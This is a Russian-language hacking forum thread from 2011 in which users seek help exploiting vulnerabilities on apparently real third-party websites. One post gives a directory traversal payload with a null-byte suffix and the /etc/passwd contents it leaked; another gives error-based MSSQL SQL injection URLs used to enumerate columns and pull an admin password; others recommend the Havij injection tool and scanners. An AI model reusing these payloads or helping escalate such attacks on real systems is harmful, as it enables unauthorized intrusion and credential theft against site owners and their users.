 |
|

17.08.2011, 01:00
|
|
Познающий
Регистрация: 25.12.2010
Сообщений: 74
С нами:
8095286
Репутация:
2
|
|
Цитата:
Сообщение от kokes
спс, попробую, но почему же забей, все с чего то начинали...
Для начала выучи гугл,всмысле запросы т.е inurl: intext: и тд. И научись искать,то что ты спросил уже давно разжевывали на многих форумах.
|
|
|

17.08.2011, 01:00
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 287
С нами:
8685686
Репутация:
16
|
|
Такую фигню выводит DLE, у меня тот же вопрос, как обойти такую защиту, кто знает намекните хоть где копать?
|
|
|

17.08.2011, 01:00
|
|
Новичок
Регистрация: 02.07.2011
Сообщений: 25
С нами:
7823126
Репутация:
0
|
|
kokes, не слушай никого! Нагугли софтину Havij и пробуй ей раскрутить. Для начала пройдись сканером каким нибудь, jsky допустим.
|
|
|

17.08.2011, 01:00
|
|
Постоянный
Регистрация: 21.04.2010
Сообщений: 787
С нами:
8452406
Репутация:
320
|
|
ох.. это не скуля.
|
|
|

20.08.2011, 01:00
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
Кто подскажет как раскрутить Directory Traversal уязвимость в POST
intPartnerType=&nextPage=1&partnerID=&SID=&thisPag e=../../../../../../../../../../etc/passwd%00.png
выдает
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
distcache:x:94:94istcache:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
openvpn:x:102:103:OpenVPN:/etc/openvpn:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
memcached:x:103:104:Memcached daemon:/var/run/memcached:/sbin/nologin
nagios:x:105:106::/var/spool/nagios:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
clam:x:106:108:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
Подскажите как раскручивать эту уязвимость
|
|
|

20.08.2011, 01:00
|
|
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами:
8017526
Репутация:
18
|
|
|
|
|

20.08.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Цитата:
Кто подскажет как раскрутить Directory Traversal уязвимость в POST
Вот уж не знал что это так называется. Dinga прав, это типичный инклуд.
|
|
|

21.08.2011, 01:00
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
Dinga
M@ZAX@KEP
Спасибо,буду теперь тож знать что это инклуд))
А кто поможет раскрутить,или разобраться,то я не инклудил не разу еще.
|
|
|

21.08.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
А ссылку на что дали? Извини, но подробнее тебе вряд ли прямо сейчас тут распишут
|
|
|

24.08.2011, 01:00
|
|
Новичок
Регистрация: 18.05.2009
Сообщений: 2
С нами:
8939126
Репутация:
0
|
|
Добрый вечер господа!Требуется ваша помощь!Вообщем суть такова!
есть инъекция 2-й день ломаю голову ну никак не могу полность провести инъекцию я не когда этим не занимался!постараюсь полностью обьяснить свою проблему!
hxxp://хост/default.asp?idAccess=1808310+or+1=(@@version)--
получаю
система - Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
нашел название БД и 100 таблиц в этой БД
получаю максимально 4-5 полей из каждой таблицы т.к видно фильтруется запятаю(,) пробывал заменить %2С и хец и чар не помогает
пример
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id','login','name'))--
поля вытаскивал таким способом
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id')+and+column_name+not+in+('login')+and+column_ name+not+in+('name'))--
если увеличиваю кол-во полей выскакивает ошибка что типа URl слишком длнный!
...
и еще нашел в одной таблице там полей мало было нашел поле password поле login но по такому запросу
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+ca st(password+as+nvarchar)+FROM+Users+where+login='a dmin')--
ошибки не возникает запрос проходит успешно ф-я convert не работает т.к там нужно использовать запятую и exec() так же не получется использовать!
вообщем HELPME!!!
Добавлено через 20 часов 10 минут
Тут есть кто люди????
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|